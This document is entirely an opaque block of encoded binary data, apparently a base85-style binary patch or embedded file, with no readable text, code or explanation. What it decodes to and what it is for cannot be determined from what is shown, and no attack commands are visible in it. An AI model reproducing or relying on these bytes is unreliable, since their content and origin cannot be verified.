z6mO}zdyl?20Cxt9Ttj!A)-Yq8bg~XDe6Q03ruJ?pXTAkpX0<ZSU3bFLHa>@>K?7z} zd}>)Oj2VhV2l?ks1(QpRXW=r3Z8f^wcy9c_nL>4(H-kwkp?eL$7S~!!-;%f{;#t8p zTcZ)dohkQ_lzr;0v65_Hw3kTEc1T?dfk}YOohbro<l5DtV!YcF4J9Lr;}3>{q<vTb zhwLW}31gT=&cYZ7WGdANmXy_J5SFR9sEo9XgjBM{NFw77^TN_3JY^RAI5V<|e`ETv z6-HFqcnz&HLB(eu&Yf|(AJ$mbbzEF|dPovk<qt;7#?bD!hW8gM&1sp5*NZUz9jf*4 zm7?6Iuk1^8SI#F*Jq3)pP9BQ&gqZZ9+P&Ud|G#k^3I+8y`u|J@mKjO3T7Uup3H_%) z`;SZg{|~FJgT;SmwMR|KVTlvTZ|5sg31{sp0lwL{Q(Y{~9|YyNlIDP*v1&4F${sGF zXKlxxWbJn*I!E=NR9HTuWX(zg->%Q&w8bY8w||>gOQLnkDVHnd3U<4;c77i&EB?59 zO$-2aQs|X54xx}zwqL@D#JS>8K)%Rw`7Fe8;XX*b?#j~{=N&jZpf;pNCA0pFzPKf= zGr=tF;~1`2lqAUB1Px70`GXcj{jAp7sNU;OcKRd5qlgR0#QYcQ1~Qftxxa^3)~L+7 zVYZO2&1G+7>3+kI4y62JZn}yC#<#mXWf~wJV`5_u1-=r6&Z3>wD`wP<0tt3ennFEY zWt^=Mq!=QiX|7YKfVX$ukQef63y~t4$J%uQg;ZXnFld-NsL+f~yvXkcE_I`MP{}BL zRL{dnNv&ab&abjqDq@@~1$Dd_J>^#zhc<^@k9&eBf9`gkG(Qv#?DCj)uk5fQ^ay~I zC=u@+VL0PB;@`%u+##N@GuB-n<vyRk|A_NXp-*8XPc?3WR3abgfZ*6KFcB=Qo^4^@ zTP~NUBdvDqv(wASqbGEy84gXiO7t>Eru2LA<~h^V2E|x0>-9(e--@tWGSfcHpLyI@ z*bjw!b#03PG@m!5(h|j^l1TpBRV2WNz)7j&8L%g1#hJda;kl=~p^V2A&N6d}Y;Rb= zcSf96@pmm;>9_N`Wz;{TANrtMZb?X0w;Ll%LCQW+PTbbMq7~+X+<8FysKPpNHqki8 z!^CU*2g*-aZQCLgZj{h!4I_0--ld#Mz(VYiQp#$0?5z>+`YU0VH1)*lxf;L%zcpHs 
zR7S)$;O4Yyfrwhi#zW|}zR&4Zj#wwND6+(c5sL)gMN5FI0Oq&z1YD!(!-`}>j7)jf zMbOClP#=>}OlYRqD0|>-;%Roh?~t*bfZZACng-4OHaEw`;PCZ(o#X6s_3!4%O5(Ch zxOe1_Z7q7v^xrd|0mrtEx*&ky?%i!xUl6|JKyPolNV)9Ee%zBK=Y-gvIBPClwLLom zLrB#rn(^&Yvk%Z??<zX`*_}i~4+WL;=K_}9!khG#p%~lI?q^hyuM^9&^rQEyP$K_g z*&X5os2m3nfR`qxJE8VaV`pYbw&xZRS>R4NXG#_MMjO_YCtF~Lf&l+3X~0&|c%>~9 z)BOuaV)y_4^0ajbQsY4WucGkpF|Rco5YRM9+P(xeHsF8rgda3cHKvNC1j6&}mYMb% z1F7r{ry1vLUGx|T;y=)AQsqFV>(}pHyEh;{;fbgvi>Aa%{WlJnuvf6rvJ}!fshLKf z=TUCwe&3@Gf3s$7eI+YDB*`yCJ?vPL)-8=xOMOUBfJ#vS)mi8MF)0ncBq+#Q$gd^n z6-EF+Z5<i)ffN>NOtjV_lu7ZVrph3TO{|s*INhEBiMc&poIRe++Sa=1v|c9bpghGX zan^!ikY!CKD+~yisgX-t*R~0>iGt%!eGEK?rxQ8lSeNLkO@XzINC|kHAgrqW@0fC* zV{E$)$X{`a`8apn7e8VgK5{>c7*)*z3LJm{Zmv7Lde`iN@b6<{FzF%p9;|xcuz9sP zI!v2w#{~cJ!5I?;pdT>-Yk**RJX$P~w^Rm_f^a_YL_Hqym%tI#aFe%uu8kQ5f+%Ry zFo}#8f0*|xNzBlm=Ig0IorT18jZ~#=4U}@P6~V)}Ed+!*9eEasq4I#tCsXW@9}n== z8}JwPr_>Y!M2ln$B-yP0-|Uj0R@H*|@s?csiF!aR4=WI4t9AEke=v8CyM<>>MdUe? ztbr_;V-R7(Oiw@v(YctQyUV4rplkeycEWQIs3uN%Nck#nMr2w&CoDu*5q$9E6H9KS zcu1MrSf(rrCln^WXcA2kx~^L{i4}l&L>_-<zS5IS1OK)J<DlLp+LA#-?BCxDO$+9% zoj(ifm6EYVv5)GSbqkwn0lYH!=h+fhg+u(rEAOk=eTFqAgUFNJUYJ$FC%kUe9@^$u zDL|Lom6}`%_*F$HwPakL7HZYmWwFovT@y>u*`ME)ny^Hxr!2Kj)b0A{LrnnAVrfm$ zc0}f=Kiq$IAWs|gF~9~5%clL_PFE0j9j@&i93VOCE5}{1sft2VQ{FiFWZ!BAW2}e@ zSIdbV+ot(@MXY9(Hf}T|7xOS*@3#x<Pwm|4Vvcow#f@fv`Hg}*DQ~;jKm9HrU_yLf zU!gyH_XoQ%Sxc);*Rcu1i?;#xr;r@8q~!}7a4;#BnS!Cl@!li&XHf$@LImdMaFwpc z>#`e63#TD5S^ru2Ne@+k^J4@FJhnI$mvAIUBCAgunaLa=gQ>d4S8V(o3FqhNn}Noz zSe}DqhUCdPIN-pJo!7n4LC8fKg?kJ6WZj;I9Hc8o1W1!D)>);T<@f<rKO0HKG9-LR zi*}sR5KY>pJ&~z4hV{j>)4muX)2!0P<FvN2yp}cr%cgm6jx2ekDG$b4AGIeZPQGOf zVwLvb{}vy~Y+e5oEj#5qmm-}HEZ4RvPfaF1<EB2~N=Bq&kC=nZh>bQoj=(mVFv5$& zRJSt&o5k*b5X_)0qYVKV*T$tj$*fx}&)J1sG`R!|Ga;oGyp@!Qo)&u@@0;77@Y|jW z$zfviiPa*YeB6IfT|oz&+V_t>&uRDtX<5tbl6%g#$v-V9(@w|!O*4S!ZXG;j;1rCb zzTG8S;)O~jS3%f3qu0zXUkQZO951Vx8EFsuQ~nK1g?(xqNg)NKfTtpj#VezXn1FEV zgT$l0F}ot~$KW76W|2*Cwy9oaD6`+GN##JFI$OE*$`_Ljr%uMYLj_zoW<IJEq;+f! 
zRzx3)`pk^~T`Cl8S!rGlWN#<s2+qfh-&A!UG4_Rtb)mWDBLHfI!>A@PTb6<La${jK zd21dswtsH``|q-Lyc$($P#q(m9>r>pndDE-A`>)iX_6!uZPOwMCjE&cn%qn9a-9&H zze&5|%e++8K2yiUoo6l2Y4y;C1NX#kcixL4=`%^e_GnJSV(p!k1~qo=IlvM5Wuw%% zI`qn*ze2Ft(A$OZ=Md(kEHO+6l%caCy!gejJ%}~K2P*^4#^{7pbO%T|7JQgr^m4sl zfU!fan)c9R6Ns;@?gr(q4!~$3D&-gMLTvVQ5j(Qqk=5hg{f$bR$sLCZ4c^7-rt4<D zLY5O8ZyUFwAtNt2UDpThHZL$b=EJPni9+%{p=y61LTKr~>!^-ev^i<^U?Ku}T_&2c zDjAN#%*FwJD~#a#SbbXs0R!K4no$^i3Imvjy^f6^;YS+b?}UICg4JAm5c%d%&|Oaf z;8_eN88h-lt4UsBlHpJtTI^k#9z_0i&W<S2M8R@#)L!AH`5<McXJzR!-U4+Iq2rU6 z+Hy9e&=7<g=ljOQe?CUrj@^pr&beTd$k}%2$C?1A>pfLZ7`XZLOVCRwj&=8{@w4fI zHe&K~luADV6_FQC0RHoSLVmh)Moq3252i$)E7saAf=oK^x_vS4&>GjkJ^xXaj%>Uq zaN^8y6boenlQwSJ12vx(3}~2QRuiK#wyG4y<TQpdzOt*EiSODOzn;Rkl1UF55pp!f z4CjAcWFi~z-uO*P$rC&p9Rt~tQHHWy@mZ_?Xc|`OlTT-ynk7+>MCKoS=m(*mjLd>u z(Ql?%Aj^WxSQNA2dhz2g$XUSZHf8`os%xyZfcMG!+6DJqvxl~(lmnA&67>tkW8Xhq z&hMY9R9o>Zk|nRyT7MEKf&33j>&2gHFh9Vw+2BmUi<^dFR5|(a2F&)U3TJGSEpo=R z$f|oFCU=+KUDR0M;rB7N^kRR0Q)A-{%S8ht2T`KbVIKD)bSfV4Or1j)IJ_w0@0tlH z^~{T=OJ&lIv2pRw1iIrIf-(tErXnUdp5Je|K|tPFn;vy!JVfOyfyju0_p$Qcn>=6= zzFJeg#BoQQn4{Xjc@0bFKdNjabK3m+PnbP-6u7I32_tH0m1Kzyyu}L2B}{Z3S%{`| zpg{n*kRePoEM~)z{$EJGFbg0@u<LtQL7<J|MNiUJ;(EUJZI(kVoA9zxS@5m}q76NT z9Qt_{<p#^RWE`@<dJ3Jt#k+~)4y^!2Mq1imJ}`!r3}K+IS%!2B)>t*u$~p5u3#`DX zdY$yoKTE{|`(rWfyKxE!Gn*RsS-&?woi6S<<%oocO>tcpT{CiD7ptrDeKWs@sTzF- zp*8gK&V1RbPkdPA6*Zk!H!Dn61vo+!SHzJv4ZcEqr!N`aP_W6TU7K099^Qbg@lG!M za`(~O0OPp%cV1O)j1Bnbv#mM}d-(7p_-!7~4;3F+R~RNdzphi*P>jtWg`!e!6eAJ< z^9Va1=zJw#;*fY%n6e}Z1sEE4@HC+n+cZ##cQH!II#B>qnL@}N*%AbsFeTb8<{3Tt z*DKZALo8~_Cj82xRB(EC8#AC_VgKoXZJM``7pIZ0m8yN96m}mirYf;^IA@y#6i%4I zJc)19Dna~jab57+h58*<>V7`ER$C|X)!EVY@`PD0y@G&H60I#c9&-0WI~uglZX``h zT9tOu|Hsui1!<y0%ermbwr$(Cr)^t*+qT`)*0gO*+qP}<Ozit|&v~!6il`MUEAz{) zGzkP02lS{80Tf|ji;s+z6BTGM@f~uJ0<Z~ok6B}fTQx%GEkJgaWgyr@Y1KkiW3o)M zSg-!CM&_L)V#nBzb@X-D&`#y;2)e?dY`o;~QFw2!2P`Z4Cp$W_8FD_tlpbayn>~ks z2Ghc-#BaKMFFp2?GlNEw0oAaNFl8+x2oOG8a_c@+2;op2sA}b=*xzdH)q^eY?2whf 
zCC7$f8ZD9<lz^Q)4&PK|`KCFoe(H<16>=Zo%r|^eTa9kA}F#9osteI{ueTz`*wA z=<oFj1&v;;Y7VH}&!=mIX!Mlh%s(;L%D77t<K#EA!CDzqj=7g_Nu1?9JC$<6ggP`@ zfw{$HoEZkxrsZ9ObOvwJzxdR~@m&)o-S_McWLxd>e*wOQCf~@|7_k2}Sz6pY<czxH zpy_Csb!!zleYqbr0%^MZksqO~iV{E-<sF5?^`u=|^v!%yi5q$7!Uo%bA#7LOtI6FA z9vG01W!x=hyT%m=*^L`zztNlPu9D_R#4gbQr^MUIZ>0E62S4x6dOZ$g-vj0~T7LW# zt}!J4o(0IESPhO)`j#&F=5eMPgxQ#PpQyhd5)~_8@j_FH8^4d}4?rfi&gR*1q(P4- z0wRjIzZ2~a@M}LJe^5c#Di+tb8DRpE9vckqFSBha9q1-rfZ8yi*}Fnh!Sg3uf35nz zt6nT%_|8khjtUH4-!$$Ahk-7eKQais64DW^GytYRvc!*xG^r<J+auF<Trn8lP5za) zWGgI+9%9nlDBj~=9$&tm?@6C_<-5b?;u3OfWjNm;3Wa>g<3f`vMPdWrDTMU%e|ow5 zf73}kBoojp=5X#SR5@3JmeLoZ3HlZ*khx5~ugBP&2HtLgK|Ny%hPhq$|LjX_gY#Ga z5W@d&=Tn0k&EEfG%cq*r;KKg5v1|!$<hT5j6M~r1dmL#<0l5u$v3SIw6x-EQcqR#U z9C$h*-G5<Ht=SfmMq<oIT!>OaetK?B^F$#>B9mn*(?Cl8?IrJ9l8S=so@64lapEkA z#>T^_zsMua45J(5jQ0i%nI4A6o=ja1=E8X4gQ<`St8uHWrjm}6yGx0^Nd2;?rZ+hb zGB4sWcb_a<0H(uw#_+!`Ksv1WXadX^&bi&7pYMk5@f9VUW`y!`Tyb#x8W{c8%E?eU zIc%1sktmCBbV;cz2~{)4b?}$fHxrqvbVdBpMwH_8caRJL^f8n-pEiU?Mvx2CM*c;K z0?Z+}Grx;ER3$gjB{~@^{m;E3;*sY$>?a4|wD<b`01e&YiVK1KZj<NkqF7dR;#lpR z5`In;CZXonyNcdGa;N*!Og56rNSWAJ*Qbz?Kvo?D<I-}bWav8G-9;(0{fxwPP{P|X zyz)lMk=<G&4Y;rA{konI>rmv;$mTvhIncCO9g*y5Q-gi+po-tPl)6RMJ`7Zy@vz?3 z;yGH#fOsiJtZayR27DF?=;IUE^|UjFdM_{|BjSDfe)hUg521G-%;#-iVg%B&K7rb! 
zKr=|8dNI&^4(JIOfrZ(I0Qp4@*0)p*O!%t+x-t!8MX@Pcfw!J*mbx5=UBJxx=bO<( zuWt6wC18O@U=g@-MC1Wv<GycSs4lTQP9M@80F-1i6fZppkK=GFhA$@NBRxu%UCjrA zEN)Ll2Vjt>0Ptfz4@J@O0)s-fREtgO5iPdNy3Y3O(ei=r{3U}C!t6<CZGl6b#iog( zTEk3)<DW>&3Rzb_N#{&NSGcw|vZ1plffACuwu1}``3r`ktmBh*fcHnUNz15y72<3Z zV7#F6XA^Gt`nuJa75UDUizp?#!ia@~cd~iTum<alw*-B`Q^Xrn`TV2cdGleYt~V$= zFP!C1f-p0PO}auqt2TUlGx#q+f68nKSUVh}eN^zP&SWrKR4J#m{+s5vyFMQHK34TT zgyZCan8IIKU|+g}8{|W}R|7qT5=JF>0AvfiLeTHkIAL5Py`tnmQZ})e11&jnD(0Bm z-ebA8o_Zh;At<7AsgrTS>0i|o8%3Lc;O9;^S_?77P&h9@RO^vzz)yf{A}V+x{*KWS zUj72E(-PZQv}O!#_;~!YOJ8N?*Xjhxfm$Y7->yt{0Nr8XE6p4!;!H+A`dEE73uurN zag-J{zLuFGwzFb1UMNC*E--Mz;X<k2N!D0I+2Gwl?gH7Q)MTnsjpH@Sp01Zx<&_8~ zMW^{$g!y>NE2Mzxha$5M97H8C%05=Rq~IpA2RZyu!9r?gQVqaIQLDqCcu-n?XRDAm z2%XI_a?EMT7kj{{E0U)!-$8G~0kkLbISC62yz)e%6oDyT^&(}Uqv5}T{qAXX8V!=T zASg$I`LMp@MnVp5kWemtgtkIbp@b+C;x<dA2|8zzM}g}_CbPT+Q+5lg0AJRQy`sA1 zO8|hA1dg;bzQP_=Zr!xtNFkN$mlMi!$bP{)AFi8%mT}FYFv?H*A)gNS0lw~%K?Nzr zbBwN{Wa3h|m81}%^kwZr6L935%6FkINiy85nt%|UH4~(n2z*e0r%54ywa6?q$Pt}~ zB84UcQF!3&+hpgF{~l_qcT-G+qK)EZ$rA{hC(mcfBtY8b7}g<okpJrKcwBApHBGIj zUB`lRKL=941|F#WU<I1{10eOF@sr!2U!Hz$tP!YFg#in;wb}}D=z>YOLxmkMB0<=& zNWY5iDdLnSC0s1U;6OuOXK^6~>kJ!H9UJc3rm;~oFOOjX8`%}zRuPAs4m`3{myXQw zzna#{J`8ifF=Cl<Z#frdAmxU)KMXuUX6$>g0vajxn_Pr~?T6~_254@D`OZTRuyw_3 z-eIYgeQH0T?BglHGhB_g{jQ`VSc)osDw|haTVrRMradk^zm`!HvG&;3HJ~|IQD)+Y z>vBCGt%=!a&KvO5hdQBffM=BqK$O9ix|M83G336&tBK6<;sztq8J;-7^b92$FPEQc zhzs@l3f^G%6kH@>1Q?N_|I-~qcN<C0iQOWKFA|LBgo9K~x9x1JMa?#GxJfEiFoc`W zn#TX=GjQ#m5NMWNR*YFi(DM5aYn?~qo`^qG=0XLtq=C@T`)!w%RipAl7=vkX=@6pv zw_I{QKE%JR<WuP>71zh~OeaS9aW;DR?qdz2B4u$ElxL{L0GPi>h=z-r=dOEBOF+dX zhG@r)3;x39F?kZgL-69SYH`&r9)O~y*+i$7fGp2HhqJ{%@PV$Ih(mzZ5rKGUh9Zw* z(>`7O6*^iaw>2u!@V@Y_MV~tBZ|!>fr_YCz;mi^QCxRn`3<z+>i*YYhfn1^V+u>-s z(iE_Vs0a_`0cM&DDqB<XMIm|n{87C-_k@0}<3&13uyZ~_9~#Q%0pqL%M{R1-AgEOv z7;)DXhH%7&f-|cfaW$AMHzVGiY(;5kOY-wA&N|`rn%s}wrHrCV{VtS_U!~SxIu-O~ z*`)l}&4z6ex?Bv)%QMs~lQ;shS6z~1xC#_iA%krp3OE`Io6dX^|2fU;?ewksv_aEW 
zjnXxmHcfq-hEMfLb$V&!i)(NO`eJ>tH|)y6gJ1%#S$Bl|E<)2OO?L+>q`5U#Hxc04 z^LSLo(0I!D%6EBQQP)Z{><_89yfl%cffwEsK41uryuMq@PJS-f5U?UNAjr?JFe;WZ zgz=2`26$UDA9hFTNg`eb@zOL`2l}ILo?C#6bf^dKm-Y9@k8bslNIX4NqNTO|wXx0D zQ3BZ`;EAry)>zkqon1f@B2@^w`#kyF59h=@x#2-0OSx{ML!g}Rf%r#xx~=MCjVvmp zh5n;XC!UWQ<pJlK|E>lx9i|y}M=(KA?5p3N3eeQ`Y8WonFvQnRL;~Ov)N;N1&^}Q5 z@2Q+dP2lEEu4-yPq4NUx;ji~uKj`Ww0Y-Zh!#J|^l`eX}O1JXC%QQ0FPSoH7fYt@( z<A>88+rg1nv+qG$imxqAtsm{Hhe6wMed2kB%45dpqEVQ9|5~Wss%{I<%`}G1<Hj&~ z0(uTeUI}+NxaJpSdzzrO_Ea(pnj=<32@@M^JUPD9X%DHGGjE$4b#}9`TV6lJ^Kx-O zYWAIkEIdlR_2QpmuFq)2ZS#4ckA9nQ%=<&PxzBO;wpBk>uy0|G{F`YIAf|THNj+*X zGp(JTKHJ@w^9F<<E1V7MN~xVR<1VY307^&;K{y`BEryUNQUlYNzPHi_ptstM9xOap z=x0<TC>BpY-+2nIYvwr=rCv4sfTw^y)YH4kpkR>~{FggAV!=e>L*LU$-{51r$g-6E zQYJA~I+rP%HY}e|8-oLsMm^u*7VvK@esHl@&Rx(Vi7*5qPr(d5w+zF1dTeeRKw6NN za-EqJi(^;`Q!~Upn0&x4iKSDJ736#~kJU6ThjoTrsk(YgeduXMqb+Hvyplna^b^{j z#ko20&W$bIkaN6GS7(36A(;Gjp(#3l9WGSAN)B8ycT2h&gHb7Q{1WwhRas7f>rFlj z|8v^0FEV0LEZnxesRt11P=0?>z<{_O?DNRIXcjh<E%(!*P<IM5d?aKq14iE(hNbhb z7$hcZ$i2-)E_E~C^bNkj=COIq7+8rIjQDgp=+RUMI^Nztrs%Q-h^Gph$lZi0C^HDZ zhyYz4Cg}(lEi(G0wGa2UV|#KZ;-6{~freHG#^+RS#!5=Hmg2u2f&Hk20C#~}g_krb zixx)S4wyo2`qRMve&{`}#~hnpP_|I){%3u)RKs?)%MXo)QQVdKbZM8q<rtEjEj%)V zfe`UV+<u~?3g+k~fP;14)slbw*zo24U4<XT3m}-Xsr&_~(}b${pYKbEUE!x6R`s8s z>-Db(+8ZC4q4%GQd&Q+A0Kh<eyz=TN*ZPT3Z<}E`+w)PSk`uN-TUbch?uNB;z1N_$ zqn4*s>dWk0RryPzFqrYE?1`N=aMQ4v<i-NB><TiaMrR+fT(>tN%3K4?O?JdG+77(C zfNHMjQ5sE#jg>R=b0o+r_YX!@$4*V99H-$QxP@U&4X3?lHsPm1z)lUwhitd%*TH%J zC%rB6HQI%654C3P!tFbVnpHns-HKYnIcj_~BZrq|zA96xB9p^q|Kt_@Yen%KXY$67 zkT)STBa}!-R7xBri4<w!j?ey63Riy>ttYol@jVxS7{`cMa!PMGiG<&B*mNj5Tt~{e z!54ft^+x*4I;_7RkXq+NROeYtu6CpHN)k@6%=y8x?kyp#hNl+=N;^<wAZ3)2a~u8K z0uxCUqbG=5ezxc#_*>-`R`uAtxTqP-8M;)EB^DD6xQzf(t_iO(0>svmn~$OAzOkDq zjTAn4$3yR9-~3HJ(w{gfY^@WkD2M{zd%^d*)nTiIsrnigFgxG<$uh_Ih6W}pwiFrA zNoD92jsbW4aFmQ~Bsrrs)V0r&M77Po&$(6PO@C4(gQB4_$IA1Uu-)lY`$5(QDl?4X z^pqj<9&YjAb@GpIAxagAioW$cmS*?z$cNduBzswoD26=)ai%9@1Qj^H&G8br8o{)o 
z{oF%TtFGlVz}v3QeNKQMutShCo{iHkj8d9o>~c;_lKUW1U{H7p$m*wh8a{?J0cP<z z@+<q~?*tj%e84Z4XhG%|q}@tbr{7E%$1Q4|2kq1?{v58d#PuX}u@&x%qDn)5r$P3f zk2)F|->_B^ISA&+5PWyXIS(7i62SC5eQII~ZJTHUaCi#)+q;f#h9gZcC~2J!U>dN2 zkCv_2qd{LuBhAXIok<v*Zh<9cC(!qu$5+@Gn#ekq7@D%y>w6<wITqTdh`e@8{K9Tv zT?yQWd;Ijpbja_2K7i)lL=eDqut<n#kru!{z>7w!8-5w`a$RwVc55{7a|eV&k7$Xm zW_8>c6?eXdR~LUR)*x=-8U<1A61@xW4+}qvB!I!=R3066FEa=aQZe-VjmxH8<2g%5 z{N^cHnG9XdfNmqHeyZlAi^J$+MI$%-B>Z2iuL$jh(7@k+30IJG#sC^zfWx{J5+F>G znZ%w+Qw+-PMnUW^yS!yGjXcTZQz%i>D(tIq*R?nNnflu`XJaP^!ePo|$+oC2@bl$o z{@U6Og&vs*&1*Ehc65!}MS8GxoAACY!A0o(_&<Y5=$&n_U>OEUd^I&kq^I^4Np6}} zYnnw8`2&h5#`zLkc3)5_pcT}~*?;{X2VI8D7b8&D<N7={*m}4<SX3%C#`AJN{xFgk z-MN3!tR=(o4B>-B6>q?lh(V0+BB)W&dceOEI#&YK`U=N?38zHbIrT4APG|6WH}j+^ zi-I3Ue3|xTmC}$BSHSZLiTZAW%Lww9Ka{8iF$h6_3~jvRrY7GjV6rHtH{IBYq{tSz z7?H=fNsgr%SvooICY1u4UcV+p)iD;5c{IStW2Md90Qb-%RMPl(IqqXcNVt#ywO@9% zO1LV;OjDL4K_l2~tWSCnXd&gEZ5R)32s^4>Y|*N!U{HH#^fT@w!>Tn+N$wQCMVLtA zY&)icJKe{N#e~5L@D$3+b@39X$j`+WG<`wg$v?x}+fkyavK8{ZmdZIh(M*ZAWWT9N zD@qB4Jra>uIr9t0IH_Zn0R2d=o^kXn>fx}AhAI@Cr<%}UUL2!>iSd*tw<GUI6j&Q6 zCfSjCQBhqmCJM6PfCi?VJD)147ixq$+t{mwz^VL%*@?vz(B-AR8s^HN!A~73W_<v3 z4V-zMuN<0tjzC5dNCym&CJ&v{3n$q!M#fZ{0f4Pin$oSoFv`7098aoe$WL^Y&*x&+ zq$PGxHXzS@FP^LKbeobEK1EvZ>lKO}4V*GEcn_eqJts4c3hQM63?m^veCF<FUtC_0 z*T^!OXrG4yutK=LBW+VOVM5Er7s71}Dp|~7dzq*xR1vJ>+%l%_(m~ZjT1vT(b!wWc z9MBEPQ1JM;k5<B;2K<IKFKN4$p5)}w(tc*Kuy1+UiE?WftOj&jugy^947;J9WNTe7 z4h|rTBM1bY$VKz>rcH*AQr^1k*CC5{C-YD8+C~xpv71fy3!ck#dNu`wvghB6?8b^8 zLL*TKbkBqSC#@Q|KR4O24dM<Cv%I-0@$(yI)(zb}4%<yKgd4PK)LRyC54e!4eHnOZ z6p2viax8SqIn+#4L`&+6=F@dAO~w^v1kA(UiElKbM8?ksSc;+SfnK5UP$5SB%zKd~ z4(l)gZ*7ahQ<`(L0Xd&Xbx&<JcK1gxJVM=>rl4BbL2J3&g9FL}ZzG^W=L=3wdb!T& zn5nkr-?@~sN7YR$%Te6gq`{0%0tcAb(}aFstF_vg*Heh`^+$x9v;MX3&o0d^`Lk== z8g35G38rV8|7si+s7XD+T6(7v1jj%4b^^r!e|5J@zWuv5z*!_#Z>V1rg*=cCl_W!` zjcmXYYu(*UJcqQ=&N5B4$D1(I(h#PI>SC9x+%-z~cKG5!Z2Y0@vZL{5vG8!22fEw# z-TwZfcsxXIL%-GQH)PG5u1oLTFPQ$VdXPWdIgCXsQIXm9yvizxn@1k;cg}9~q~UuQ 
z(3L&yL6NCKGA&t)JYvFnO#A9tX?UlWEz{BmI<H(<6#S>A%;K%!j%k3Q>l}#z(B19Z z-&53FtNfub79cB%W7lYm2L}I+_dv+-CUp2L$&){$DGQuQx9Tb22v%2E2YE}WbGrY^ znm{c0d8Xi$n&3zFCE(3uDL=66w)n3)?rs<>{)QlSvDQqFkf{Y?Inu<g#|BnR&*%p} zJgu>h<}~ctr9@Sa;@2eRua16*?YE=w=<U@D{YM1|sAD<zhkaehrmr3?uPhz+k|f@M z<#9L(0~a-dtJC7H!hBR1ib|q0QFui%Fe)$2%#<~ODcre-(ug7(j0e1$BXDzY0AkJY zulky6Pr^ubVXfXi=^N+Si+G9O?U(jcu00ENmaN9fBJD^0TybtlYEb9Z3}Uv-&`70+ zw=K||+$~+qR=*(^dLPBKm~N~kU^?IYH&5LfO_SzBezh+}Lm{+)uTs=`Je};?rqH$q zN_~SP2YNGp(rvBBfd_38T6tO(0{Ci8|FR2rEr9H;!M4c{v;uHr-ThkOknC9Qp^F*u zM<c?U!8ao*el`yG2?A+5H&$R>uyIJ|TeOxs3KN}GNo`$v*C<uEn@lo2J=eaR`uFJb z;B1F9iUi>79vHEI`2X1O>GO3webujyfp|U}Ye!uZe+m1>>s|Ho4&b-J8#zfNxKvb; zUrqr-y<dP;V~@Wm)Mye0WEXE6H&PHcPS@KzeU<+T+d2kUxDVAL@fD9T{Yf%=B+A+* zm4bJ33FIWW5Vo*Skf?7HO$vfMrt11XF5Fh4aGE>B|0oY==`^_D|4F?hxlw7!|I8`N z6zTjqG=u;SlyBP~n3OcqN@X+N_O=TAPK7Mj_3XB*;T}B)(^v?Uf8G@FdN4BWl{-N1 z7PwGQQuPSuzo;u>i?mUo-!pjhR_TlT%j$(O4Ll+2v+!Xh6AP{f4?YH?SXN7B7;@ZA zCW~#gQ4;p>2ni}UXVBOEv(J=gi>ZVHI8s$iZWBPK)2Fl3IV!th=QYQp<lNUw2X_y) z(MoDkTmp4(QeTo0NiBCfUPJcLwl8Uot+(g>H4S(Adv!~CDWS}%k$F!$31%5+-uN$0 zD~SJ;7Z2*x^4WD9UPIemj`S4H8lAjuo3llKG+ms(3SED<M5R$|F;s;I%rA3s2*sDq zPF{fj1?z9;#Mu4Q9QHgA>hEhT{xWheV%B8y22%UR9ic=gSCb+R8$KIiXeK0It~(^) z_)z6I(&I)KNZjMd>G{jHe%9ae$`O3m67FQizY`V=vb8mkP2heuO&@W;6Zoh`G$NYP z-RbD}m#IbHJi;pGjSn^Z-Ct7i{kwgCdj9|h-B~x~7pBZ34Aj+5<~UfZ8M~S5B1USf zHmD)cYqUn}SBK9C=5>E1YJE<VWX7r;rr92XZ$i;n!S(gL7kzAPtgO^^vRP;Lsn&UX zpBG42&RuQZ>^dY`-$7A4brY_7u6*07%?cM3e#E{DYO(imgx_zYacORHiG+vbpR@sZ zxV~vwD{uges>qUoivLW7clJZ!5(m*Q$?7_MBUMe`mXsvu64iEJeJQ#}rZ|5)2~#+5 z%+^hOYfV9%k1OzuEpz+OM8RbWCs3ONCk}5|0YO=~`p;uLNu*aiGdA~R)FI1L26e8I zn1h$XMM{J}$^>-F_?Ue8t^(!Q1&M&SX79Q`chFi@Ei1H8GKk6ou+)j#*s^$S8uHkh zLR9L%2O|ovuxxgbD<&?=WFqgR#P=B#Q`sO5C6J^r7Luwra%8tX8m9<+?n8iep)&43 z(d?f844aNHY(_jw;v@#Z02|_P{vK2dV(2IRO_Nz#Br1t*utnqf>B2#Taoq(7mjPn! 
zldp6R&LZ+Z;%WVze^+6dgr2C~YPF-dC0!z_P`TU4n<-;JCm7BWhfu>YE>Bn%=e$Nq z1*YYv5WAU9u+0Utb%mpnre;p!$~jIUByX(&x0f>2L}gj`E=*c9e`PGWU3;qQi8(0D z;q<Uuu;wn?G3DG#Ag(BAyP^vKzI5Tzr62J6aeuEjBDApjLK4=qn*5b;HDhJni$rSY zHjHDQ8C<fgM^=_QT;)3OL^eW9KUuo?jtSmig^enl{nd~60$cFw#q<w91an=*TANa1 zP9V_myd0Ai9v!v?gC{YR6d~j;lKEfLptB<pHdtly4AIoze2|hHsQr!r-A|kTLHwc& zkVbUtevEm!08gGHx#%1dg)F9!73fRxqV!`CyPP%Q$F8CG$R#;U3Lk%r@CR(mfWy*? z7Q=AT<%kzD_6};15GUmbTPijvbRnU<6N1R2quG!TV2f<`W@g2zRpXYU{p{j0%hg~} z{v(Lz`0ce|pn>3`gXwg@P7A^*=NSr<ke>To>eeQiqF*g?^3%rl=V?n*p;TW9Q}4$a zrLS38&B@C6t{y^ZTn?sy83%E_>YSC(6`24i`Uy2*)GGdy*y%4~s|O0Rj<u;+|MU6H zWp5?DPQuIQ>j3aTCcK|ZkN)%H_(e@Szw**>(7lu8gRqIC1-3VUVVl%4)@OdX3;mmM zev02O^H=DKbkeF5eU8V~CL6>kK*VSQThMqWjxty=%Y<B8V8SE@p0y2>X<Xd>`Bx~7 zy&J+Gk=&WnX==(~Sqnm#<}M|Z@o%CGr3}7vCMOFRsiMdgyWbdV=Wamfv_w#W`?oYf zNU;&p!&P~Sa6D`P?B<R{zth4kYB}%a<@SyvUOm)f%oksf+Ibh^uIayqMNUkY*R2-# zaOKcM34BZL#0Y#)i4@31ex7tg7UV<x&s~Emr7>nviij+w(x%pg1QU;5eUFSpOjnno z&5VdqHf7RAFRzx@j5ODbJd<WV&l2Kb{(afwEAV#^TzMFPyOf#bw0L1xJz}0~rAAoR zf1jAWUR(lon_%H8JYWk=ic_PaUfRNM9ir+a?z<=jG{??Zi&2>F*8_@u==8t2ZH&%_ za6D2jYD5leF<1W*=lx4b|AJ<GAq}$P)Z+B{SIK#50#``Xnj!QwVNCx69*B&&Q66I4 z=;D6*a02ZJn9cBgRX|N@A+B>>v|D}@VXM$>0W~|a=`#`!SxR0nr~GaAYv4q|4c_5S 